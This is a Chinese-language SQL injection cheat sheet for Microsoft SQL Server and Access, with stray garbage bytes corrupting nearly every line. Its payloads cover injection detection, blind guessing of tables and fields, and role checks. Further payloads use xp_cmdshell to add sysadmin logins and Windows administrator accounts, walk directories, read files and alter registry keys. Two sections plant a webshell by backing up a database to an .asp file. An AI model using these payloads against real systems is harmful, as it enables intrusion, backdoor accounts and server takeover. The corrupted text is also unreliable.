1.判断是否有注入;and 1=1 ;and 1=2 #4M0%�rN��
2.初步判断是否是mssql ;and user>0 �Mk[`H�EO
YqgW8���EM
3.注入参数是字符'and [查询条件] and ''=' k6BgY|0g�C
R`q!~�8u��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��@�:B�1
\��`R�eZu$
5.判断数据库系统 qgNK!(kWpr
=�6&�D4~R�
;and (select count(*) from sysobjects)>0 mssql �^q�\zC%.
LS�'�=�>s"
;and (select count(*) from msysobjects)>0 access 0
,-b �%X�
'9@R=#n�d�
"[yiN�J"kt
vuB�A&j�0C
6.猜数据库 ;and (select Count(*) from [数据库名])>0 T�"U t�)�.
�8BDL{?M�u
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �U�m�g�81!
WKsx|�a]�U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 n~j�[�P��w
Sj?sw]���3
9.(1)猜字段的ascii值(access) tpON�SRY�
<�>s�\��tJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sdQv�:nd'R
lvi:I+Vg�A
(2)猜字段的ascii值(mssql) J��B@V�P{
W?-BT >�#s
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 "�M^W:�4_
u(7�0��2S4
10.测试权限结构(mssql) :g�#i��t@
�Z;D3lbq�E
�uW=NH�;�u
�"~C#DZwt{
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- D|9fHMg��%
��vWs� c{9
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j*d~h$[�k
�^~ ���$&
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �-�FV'%X$i
X>7]g6�70@
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- \*a��Lyyy3
��<�|3v�@�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
�@l� Gn�G
X�WpnZFjE
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �^1=|�(Z�/
GK?R76��d
;and 1=(select IS_MEMBER('db_owner'));-- �p�I�iE�D9
+z�0}{,HX�
4uAafQ`�@H
"B�3:�m-'
11.添加mssql和系统的帐户 �yX3H&F�6�
Ba|}C(Ws?�
;exec master.dbo.sp_addlogin username;-- 3z92Gy5cr�
;exec master.dbo.sp_password null,username,password;-- % T���\N�@
s�A�-W�^*+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- U^�BXCu1km
2�_n*u^X:_
;exec master.dbo.xp_cmdshell 'net user username password 3Lk�i7Q�W`
ok%!o+nk.
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ;�<@6f���@
rq[�"O/�2
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �
�iLcadX�
{))S<_�y�N
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- F�NCLGAi�Z
UQ])QTrZFi
zB��"�
`i�
Ju��q�n
X�
12.(1)遍历目录 e��.�|�R�C
}, �&�,�Dt
;create table dirs(paths varchar(100), id int) �vx���}Z
Gj8�[�*3�d
;insert dirs exec master.dbo.xp_dirtree 'c:\' 8�:?�Q�(M7
|#:d�C �#�
;and (select top 1 paths from dirs)>0
�ZHECcPhz
J?q�uY��lS
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �cN}A r��v
&d3��'�{~:
I�@Z*Nu�1L
�U4l*;od
(2)遍历目录 PJ'l�Zu8?x
Bi�:w�P/>v
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- oEoJ�a:h��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 '�oZ�n<�c`
k�Ji&���9
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 tr�9Y1vxo{
{�-N9�0�Oe
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �pkf�OM"5'
2vd�Q�&�H4
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 *a,�.E6C�*
)�� v5n "W
7h9[-��d6�
R|J>8AL}BY
13.mssql中的存储过程 V�/9"Xmv75
ro�^6:w3O^
xp_regenumvalues 注册表根键, 子键 D4O5�@K�fL
�%�iL@:'?K
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �*8X9lv.Z�
\�.�;ct���
xp_regread 根键,子键,键值名
G<-9U}~76
yX.5Y��|A<
;exec xp_regread ElR&scXi__
+<��WRB\W
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 NU&^7[!yl
�q\�'�P1~
xp_regwrite 根键,子键, 值名, 值类型, 值 JRj�Mt-7H_
C:G�HP$/�}
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 T�~~[a|bLa
z5�&%T}$tJ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Ms'TC;�&PS
j�)tC�r Py
xp_regdeletevalue 根键,子键,值名 J�lDDM�
%�
X]�pWvQ Q]
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 -8Jl4F ,��
U�G"6�RW @
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 "�ex~�L�B�
:7Z\3_D�/
R�(?�<��97
N�s|V7|n�]
14.mssql的backup创建webshell E�7NbP�N�d
2�VV[�*Q�I
use model ,KhMzE8_a�
B�=���=�a�
create table cmd(str image); n��ze1]3�`
g"!��#]LLe
insert into cmd(str) values (''); =SK+��\j$
[[?�[? V ,
backup database model to disk='c:\l.asp'; :
>w�Q��wf
ICl�_ eb�
o�(d_uJOB�
zJuRth)�(,
15.mssql内置函数 +)J�NFy�-
�'/u:��,ar
;and (select @@version)>0 获得Windows的版本号 ;Up'~�BP�(
3:~l�2KIP4
;and user_name()='dbo' 判断当前系统的连接用户是不是sa y@k���cXlY
3�$$5Mk(&�
;and (select user_name())>0 爆当前系统的连接用户 juYA`:qE�&
"wF
�?Hamz
;and (select db_name())>0 得到当前连接的数据库 �\at-"�[.
x�?f0H�k+
�o[��6vxTH
(o*e�<y,}W
16.简洁的webshell v�TMP&a'5L
4kaE�}uKU
use model qb�-2Q�PEB
o�!s%h!%L�
create table cmd(str image); $��d2�kHT
{8{t]L�K<�
insert into cmd(str) values (''); �8_<&f�%�/
�oP=T6PX~l
backup database model to disk='g:\wwwtest\l.asp';
